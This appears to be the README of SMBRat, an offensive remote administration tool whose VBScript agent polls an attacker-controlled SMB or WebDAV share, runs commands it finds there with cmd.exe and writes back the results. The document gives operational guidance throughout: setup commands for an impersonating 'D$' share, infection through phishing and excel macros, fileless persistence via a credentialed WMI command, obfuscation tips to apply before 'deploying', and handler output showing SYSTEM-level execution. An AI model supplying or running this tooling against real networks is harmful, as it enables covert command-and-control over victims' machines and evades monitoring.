SMBRat

SMBRat

A Windows Remote Administration Tool in Visual Basic Script

Idea

Windows Environments like Active Directory Networks, get really bloated with SMB traffic.

All hosts get Policies from the SYSVOL, configurations need remote files to work, desktop shortcuts tend to point to \\\\something\\else\\in\\the\\network.exe.

None would notice one more connection attempt. Right?

– Especially if it succeeds (it is a fashion to only monitor Firewall Denies)

Ingredients

Agent

Documentation/Archiving Friendly

The agent is a Visual Basic Script that runs on the infected host and connects to the SMB Server. It creates a directory in there named after the host\’s hostname and primary MAC address (trying to be unique and informative at the same time for reporting purposes). All commands and info for the infected Host will be stored in this directory. zipping the whole Shared Folder will archive all project info!

Stealthy

It does NOT use a drive letter to Mount the Share, just uses UNC paths to directly read remote files (no Drive is created in explorer.exe).

It also injects the UNC path into the %PATH% variable of its own execution environment (you can run executables directly from your Linux machine\’s filesystem).

Agent\’s Execution

The agent is configured to run once. Statelessly.

It\’s Routine is (more-or-less) as follows:

• It looks for a file named exec.dat in the folder it created in the SMB Share
• If it finds the file, it reads its content and executes it as a command with cmd.exe /c <command> like a semi-interactive shell.
• The command\’s response is stored in output.dat (next to exec.dat).
• Deletes the exec.dat file.

Wiki Page for Setting the Agent

Handler

The handler needs an SMB Server to work. The smbserver.py module from Core Security\’s impacket package will do.

Most probably smbd would also do the trick, but hasn\’t been tested yet.

Setting up the SMB Server

A share with name D$ is needed, to look like a legit Windows host\’s SMB.

# mkdir Share
# smbserver.py -comment \"My Share\" \"D$\" Share/
Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

The WebDAV case!

As the agent is configured to only use UNC paths, WebDAV can also be used with zero-changes.
Instead of an SMB server, a WebDAV server can be used (a great WebDAV server with SSL support is wsgidav).

# mkdir \'D$\'
# wsgidav -p 80 -H 0.0.0.0 -r . --auth anonymous
[...] INFO    :  WsgiDAV/3.0.0 Python/2.7.16 Linux-4.19.0-kali3-amd64-x86_64-with-Kali-kali-rolling-kali-rolling
[...] INFO    :  Lock manager:      LockManager(LockStorageDict)
[...] INFO    :  Property manager:  None
[...] INFO    :  Domain controller: SimpleDomainController()
[...] INFO    :  Registered DAV providers by route:
[...] INFO    :    - \'/:dir_browser\': FilesystemProvider for path \'/root/.virtualenvs/wsgidav/local/lib/python2.7/site-packages/wsgidav/dir_browser/htdocs\' (Read-Only) (anonymous)
[...] INFO    :    - \'/\': FilesystemProvider for path \'/tmp/DAV\' (Read-Write) (anonymous)
[...] WARNING :  Basic authentication is enabled: It is highly recommended to enable SSL.
[...] WARNING :  Share \'/:dir_browser\' will allow anonymous read access.
[...] WARNING :  Share \'/\' will allow anonymous write access.
[...] INFO    :  Running WsgiDAV/3.0.0 Cheroot/6.5.4 Python/2.7.16
[...] INFO    :  Serving on http://0.***0.0.0:80 ...

[...] INFO    :  192.168.163.130 - (anonymous) - [2019-04-18 14:57:53] \"PROPFIND /D$/Project1/DESKTOP-I3NFOQ5-John-AA-BB-CC-DD-EE-FF/ping.dat\" length=0, depth=0, elap=0.004sec -> 207 Multi-Status

For the SSL support, the UNC paths have to change slightly, from:

\\\\<Server-IP>\\DIR\\

to:

\\\\<Server-IP>@SSL@443\\DIR\\

This change can only be done to ServerName agent.vbs variable, as all paths are constructed by this.
Keep in mind that the SSL certificates have to be trusted by the system running the agent. Self-signed Certificates will fail with warnings.

Infection Scheme

Infect a Host from a file

A While loop can be added to the agent.vbs file\’s beginning, with a delay statement of multiple seconds (10 secs is ideal), and it will be able to infect windows hosts by double clicking / phishing / excel macros / etc…

A while True loop in VBS with delay of 1 second looks like this:

Do While True
	[...]
	WScript.Sleep 1000
Loop

Infect a Host fileless

Yet, if a Windows host has RPC enabled, it is possible to install the VBS file as fileless malware through WMI and the fabulous impacket package examples with a command like:

$ examples/wmipersist.py \'<username>:<password>@<hostname/ipaddress>\' install -vbs agent.vbs -name smbrat -timer 10

It is also possible to utilize the WMI tool by local access to install the agent.vbs as fileless malware.

Obfuscation?

Visual Basic Scripts can be nicely obfuscated, base64\’d as well as minified.

It can be really handy to give it a spin before \”deploying\”

• Online Tool for VBS Obfuscation
• Github Repo

Directory Structure in the SMB Share

Never create folders manually in the Shared Folder

Barebone Usage

At time of writing, no Handler shell is implemented, so usage can be done by just using a command like watch to inspect the output.dat file:

$ watch -n0.2 cat Share/projectName/DESKTOP-XXXXXXX-AA\\:BB\\:CC\\:DD\\:EE\\:FF/output.dat

and echo to write stuff to the exec.dat file:

$ echo \'whoami /all\' > Share/projectName/DESKTOP-XXXXXXX-AA\\:BB\\:CC\\:DD\\:EE\\:FF/exec.dat

The handler.py

The experimental shell works as follows:

$ python handler.py Share/
SMBRat> 
# When a new host gets infected:
[+] Agent \"DESKTOP-EG4OE7J\" (00:0C:29:2B:9F:AF) just checked-in for Project: \"projectName\"

SMBRat> execall whoami /user

[>] Sending \'whoami /user\' to \"projectName/DESKTOP-EG4OE7J-00:0C:29:2B:9F:AF\" ...
		
SMBRat> 
[<] Response from \'projectName/DESKTOP-EG4OE7J-00:0C:29:2B:9F:AF\': 


USER INFORMATION
----------------

User Name           SID     
=================== ========
nt authority\\system S-1-5-18

^^^^^^^^^^^^^^^^^^^^ projectName/DESKTOP-EG4OE7J-00:0C:29:2B:9F:AF ^^^^^^^^^^^^^^^^^^^^
SMBRat> 
				

Outstanding Pitfalls

SMBv1 is Not Encrypted :

# tcpdump -i eth0 -A
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes

[...]

15:25:06.695502 IP Deskjet-4540.microsoft-ds > 172.16.47.129.3128: Flags [P.], seq 2876:2971, ack 4791, win 2110, length 95 SMB PACKET: SMBreadX (REPLY)

E...,E@.@.V.../.../....8
.&Mi~.6P..>.......[.SMB........................
.@............ .;........... .net localgroup \"administrators\"

[...]

15:25:06.702916 IP 172.16.47.129.3128 > Deskjet-4540.microsoft-ds: Flags [P.], seq 4917:5111, ack 3097, win 2052, length 194 SMB PACKET: SMBtrans2 (REQUEST)

E...E.@......./.../..8..i~..
.\'*P....b.......SMB2......................

.F..z.....(...........z.D.........}..........\\.p.r.o.j.e.c.t.N.a.m.e.\\.D.E.S.K.T.O.P.-.E.G.4.O.E.7.J.-.0.0.:.0.C.:.2.9.:.2.B.:.9.F.:.A.F.\\.o.u.t.p.u.t...d.a.t...

[...]

15:25:06.751372 IP 172.16.47.129.3128 > Deskjet-4540.microsoft-ds: Flags [P.], seq 6049:6393, ack 3748, win 2050, length 344 SMB PACKET: SMBwrite (REQUEST)

E...E.@....L../.../..8..i~. 
.).P....*.....T.SMB........................
.T....$.......\'..$.Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Admin
Administrator
defaultuser0
The command completed successfully.

[...]

The traffic (file contents and paths) are tranfered in plaintext if SMBv1 Server is used (e.g impacket \’s smbserver.py).

• An encryption/obfuscation layer would totally solve this one!

The whole Share is READ/WRITE to Everyone:

All Agents can modify files stored in the Whole Share. Meaning they can modify the exec.dat of other Agents…
An smbmap will shed light:

$ smbmap -H 172.16.47.189
[+] Finding open SMB ports....
[+] User SMB session establishd on 172.16.47.189...
[+] IP: 172.16.47.189:445	Name: Deskjet-4540                                      
	Disk                                                  	Permissions
	----                                                  	-----------
	D$                                                	READ, WRITE
	[!] Unable to remove test directory at \\\\172.16.47.189\\D$\\SVNRmxBFAO, plreae remove manually
	IPC$                                              	READ, WRITE
	[!] Unable to remove test directory at \\\\172.16.47.189\\IPC$\\SVNRmxBFAO, plreae remove manually

Pay attention to the lack of -u and -p parameters of smbmap.

This is a NULL session (like FTP anonymous login). EVERYONE can change the SHARE Files and get Remote Code Execution on all infected machines.

• Better fire up some iptables here…

The sessions are NOT Interactive

Type execall netsh and you lost all your Agents. None will respond as the agent.vbs will spawn the netsh.exe shell and will wait for it to terminate, so it can write its contents to output.dat. But Guess What… It won\’t terminate… It\’s gonna hang with the netsh> pointing to the void.